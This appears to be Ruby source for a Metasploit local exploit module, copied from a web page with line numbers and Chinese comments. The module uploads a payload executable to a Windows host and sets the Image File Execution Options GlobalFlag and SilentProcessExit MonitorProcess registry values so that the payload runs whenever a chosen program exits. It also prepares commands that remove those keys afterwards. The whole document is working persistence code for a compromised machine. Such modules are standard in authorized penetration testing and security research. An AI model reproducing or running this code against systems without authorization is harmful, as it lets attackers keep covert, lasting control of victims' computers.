1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Deprecated
  moved_from 'exploits/windows/local/persistence_image_exec_options'

1
2
3
4
5

register_options([
  OptString.new('PAYLOAD_NAME',
                [false, '目标主机上使用的载荷文件名（默认为%RAND%.exe）', nil]),
  OptString.new('IMAGE_FILE', [true, '要"调试"的二进制文件', nil])
])

1
2
3
4
5
6

def check
  print_warning('位于%TEMP%的载荷仅在重启前有效，建议选择其他位置') if datastore['WritableDir'].start_with?('%TEMP%')
  return CheckCode::Safe("#{writable_dir} 不存在") unless exists?(writable_dir)
  return CheckCode::Safe('必须是System权限才能运行此模块') unless is_system?
  CheckCode::Appears('可能可利用')
end

1
2
3
4
5

def upload_payload(dest_pathname)
  payload_exe = generate_payload_exe
  write_file(dest_pathname, payload_exe)
  vprint_status("载荷（#{payload_exe.length} 字节）已上传到 #{sysinfo['Computer']} 的 #{dest_pathname}")
end

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

def write_reg_keys(image_file, payload_pathname)
  reg_keys = []
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",
                value_name: 'GlobalFlag',
                type: 'REG_DWORD',
                value_value: 512)
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                value_name: 'ReportingMode',
                type: 'REG_DWORD',
                value_value: 1)
  reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
                value_name: 'MonitorProcess',
                type: 'REG_SZ',
                value_value: payload_pathname)
  
  # 创建必要的注册表键
  silent_process_exit_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'
  registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)
  
  reg_keys.each do |key|
    registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])
    vprint_status("写入 #{key[:value_name]} 到 #{key[:key_name]}")
    registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type])
    unless registry_getvalinfo(key[:key_name], key[:value_name])
      print_error("设置 #{key[:value_name]} 为 #{key[:key_name]} 失败")
      return false
    end
  end
end

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

def install_persistence
  validate_active_host
  payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
  temp_path = writable_dir
  image_file = datastore['IMAGE_FILE']
  payload_pathname = temp_path + '\\' + payload_name + '.exe'
  
  vprint_status("载荷路径 = #{payload_pathname}")
  upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)
  
  # 清理脚本
  @clean_up_rc << "rm #{payload_pathname}\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}\" /v GlobalFlag /f\" -H\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v ReportingMode /f\" -H\n"
  @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v MonitorProcess /f\" -H\n"
end